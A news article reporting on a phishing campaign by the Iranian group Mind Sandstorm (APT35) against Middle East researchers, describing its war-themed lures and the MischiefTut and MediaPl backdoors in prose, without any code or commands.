In recent months, a sophisticated Iranian cyber espionage group, identified as Mind Sandstorm (also known as APT35, Charming Kitten, TA453, and Yellow Garuda), has been actively targeting high-profile individuals involved in Middle Eastern affairs. These individuals, based in universities and research organizations across Belgium, France, Gaza, Israel, the U.K., and the U.S., have become victims of Mind Sandstorm’s carefully crafted phishing campaigns.
According to an analysis by the Microsoft Threat Intelligence team, this subgroup of Mind Sandstorm has demonstrated technical and operational maturity, employing bespoke phishing lures to trick targets into downloading malicious files. The attacks, ongoing since November 2023, have revealed the use of a previously undocumented backdoor called MediaPl, showcasing the group’s continuous efforts to enhance their post-intrusion tradecraft.
Mind Sandstorm, believed to be affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), is notorious for its adept social engineering campaigns. The threat actor utilizes legitimate but compromised accounts to send personalized phishing emails, primarily targeting journalists, researchers, professors, and individuals with insights into security and policy matters of interest to Tehran.
The latest wave of attacks is characterized by the use of lures related to the Israel-Hamas war. The threat actors send seemingly innocuous emails under the guise of journalists and other high-profile figures to establish trust with targets before delivering malware. Microsoft suggests that the campaign likely aims to collect perspectives on events surrounding the war.
A notable aspect of this campaign is the use of breached accounts belonging to the impersonated individuals to send email messages. Additionally, Mind Sandstorm employs the curl command to connect to the command-and-control (C2) infrastructure, adding a new tactic to its playbook.
Once targets engage with the threat actor, they receive follow-up emails containing malicious links leading to RAR archive files. Upon opening these files, Visual Basic scripts are retrieved from the C2 server to persist within the targets’ environments. This sets the stage for the deployment of custom implants like MischiefTut and MediaPl. MischiefTut, a basic backdoor disclosed by Microsoft in October 2023, operates in PowerShell, allowing it to run reconnaissance commands, write outputs to files, and download additional tools on compromised systems. MediaPl, masquerading as Windows Media Player, transmits encrypted communications to its C2 server and executes commands received from the server.
Mind Sandstorm’s continuous improvement of its tooling suggests a commitment to persisting in compromised environments while evading detection. The group’s ability to obtain and maintain remote access to target systems enables a range of activities that could compromise system confidentiality.
This revelation comes in the wake of a report by Dutch newspaper De Volkskrant, disclosing that Erik van Sabben, a Dutch engineer recruited by Israel and U.S. intelligence services, may have played a role in deploying an early variant of the Stuxnet malware in an Iranian nuclear facility using a water pump in 2007. The interconnected nature of cyber espionage and historical events highlights the evolving landscape of state-sponsored cyber threats.
Interesting Article : Spyware on iPhones: The iShutdown Method Exposing Pegasus and Beyond
Pingback: Androxgh0st Botnet A Menace To Cloud Security